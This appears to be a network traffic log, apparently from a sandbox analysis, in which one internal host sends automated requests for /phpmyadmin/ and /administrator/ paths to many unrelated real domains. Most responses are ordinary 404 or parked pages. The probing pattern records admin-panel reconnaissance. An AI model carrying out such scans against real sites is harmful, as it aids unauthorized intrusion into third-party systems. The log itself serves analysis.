2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a Data Ascii: <script data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="j
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 6a 73 2f 64 69 73 74 2f 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f Data Ascii: js/dist/codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 Data Ascii: loseText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 Data Ascii: ''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 Data Ascii: ax: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 Data Ascii: uery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js
2024-02-20 23:26:10 UTC	1369	IN	Data Raw: 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 69 6e 64 65 78 65 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 63 6f 6d 6d 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 70 61 67 65 5f 73 65 74 74 69 6e 67 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 Data Ascii: X.fireOnload('navigation.js'); AJAX.fireOnload('indexes.js'); AJAX.fireOnload('common.js'); AJAX.fireOnload('page_settings.js'); AJAX.fireOnload('vendor/tracekit.js'); AJAX.fireOnload('error_report.js'); A

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.6	56778	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	192	OUT	GET /administrator/index.php HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	338	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://amsantechnology.com/administrator/ Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.6	57036	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	214	OUT	GET /phpmyadmin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:09 GMT Connection: close
2024-02-20 23:26:09 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.6	57032	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:09 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_FbvEMrqsjKDRC9ThXAI+DHFNBovSsQ9JlX1bqPEGbPfUeADVtOBl/ZpevJZx36NBIs42EKJzgq2gvP+iLGYzkQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:09 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.6	57018	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	182	OUT	GET /phpmyadmin/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	409	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Tue, 20 Feb 2024 23:26:10 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:10 UTC	15975	IN	Data Raw: 37 38 46 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f Data Ascii: 78F0<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found – norwegischlernen.info
2024-02-20 23:26:10 UTC	16384	IN	Data Raw: 74 69 63 61 6c 2d 73 65 63 6f 6e 64 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 73 65 63 6f 6e 64 61 72 79 29 20 30 25 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 65 72 74 69 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 74 65 72 74 69 61 72 79 Data Ascii: tical-secondary-to-background: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--vertical-tertiary-to-background: linear-gradient(to bottom,var(--wp--preset--color--tertiary
2024-02-20 23:26:10 UTC	8177	IN	Data Raw: 30 30 25 32 43 37 30 30 69 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 26 23 30 33 38 3b 76 65 72 3d 36 2e 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 31 2e 36 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e Data Ascii: 00%2C700i&display=swap&ver=6.4.3' media='all' /><link rel='stylesheet' id='twentytwentytwo-style-css' href='https://norwegischlernen.info/wp-content/themes/twentytwentytwo/style.css?ver=1.6' media='all' /><script src="https://norwegischlernen.

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.6	57184	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:09 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_dRUJ9PPbpa1AIHdTMS+whOh4IdJLcdxUTZ1DdBV321BRUQBTxvfUNsl41MzhcqPc58X0l3aJCiseknTzccdfVA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:10 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.6	57161	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:10 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	57284	178.33.253.225	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:10 UTC	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:10 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:10 UTC	16040	IN	Data Raw: 31 65 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 26 23 38 32 31 31 3b 20 43 46 43 41 20 26 23 38 32 31 31 3b 20 43 61 62 69 6e 65 74 20 64 26 23 30 Data Ascii: 1ec3<!doctype html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page non trouve – CFCA – Cabinet d&#0
